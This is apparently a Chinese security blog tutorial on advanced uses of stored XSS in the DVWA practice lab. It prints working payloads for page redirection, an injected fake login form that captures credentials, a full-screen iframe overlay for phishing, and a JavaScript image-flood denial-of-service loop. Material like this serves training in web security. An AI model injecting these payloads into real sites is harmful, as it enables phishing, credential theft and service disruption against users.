计算机管理系统:电脑网络技术记录本

XSS跨站脚本

当前位置:首页 > 安全渗透 > XSS跨站脚本

XSS漏洞高级应用

实验环境:DVWA


实验原理:

钓鱼式攻击是一种企图从电子通讯中,通过伪装成信誉卓著的法人媒体以获得如用户名、密码和信用卡明细等个人敏感信息的犯罪诈骗过程,它常常导引用户到URL与界面外观与真正网站几无二致的假冒网站输入个人数据


实验一:重定向钓鱼,即将当前页面重定向到一个钓鱼页面

举例代码如下:

<script>document.location="http://www.baidu.com"</script>

实验步骤:

1.将js代码写入低级别DVWA中的存储型XSS模块中:

XSS漏洞高级应用

2.点击上传留言板内容,页面将跳转到指定网站

XSS漏洞高级应用

实验二:Html注入式钓鱼,即使用XSS漏洞注入HTML或JavaScript代码到页面中

代码如下:

<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="1.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body><ml>


将代码写入低级别DVWA中的存储型XSS模块中,输入账号密码后即可传到后端:

XSS漏洞高级应用XSS漏洞高级应用


实验三:iframe钓鱼,即通过<iframe>标签嵌入远程域的一个页面实施钓鱼

代码如下:

<!DOCTYPE html><html><head><meta charset="UTF-8"><title>Title</title></head><body><iframe src="http://www.baidu.com" style="position:absolute;top:0;left:0;width:100%;z-index: 999;height:500px"></iframe></body></html>


将代码写入低级别DVWA中的存储型XSS模块中,即可跳转到指定网址:

XSS漏洞高级应用

实验四:DDOS攻击,指的是注入恶意JavaScript代码,可能会引起一些拒绝服务攻击

代码如下:

<script>function imgflood(){var TARGET='localhost';var URL ='/index php?';var pic = new Image();var rand = Math.floor(Math.random()*1000);pic.src ='http://'+TARGET+URL+rand+'=val';}setInterval(imgflood,10);</script>


将代码写入低级别DVWA中的存储型XSS模块中,按F12,点击网络即可看到攻击成功

XSS漏洞高级应用

上一篇:XSStrike在kali linux上的安装与简单使用

下一篇:已经是最后一篇

相关内容

文章评论

表情

共 0 条评论,查看全部
  • 这篇文章还没有收到评论,赶紧来抢沙发吧~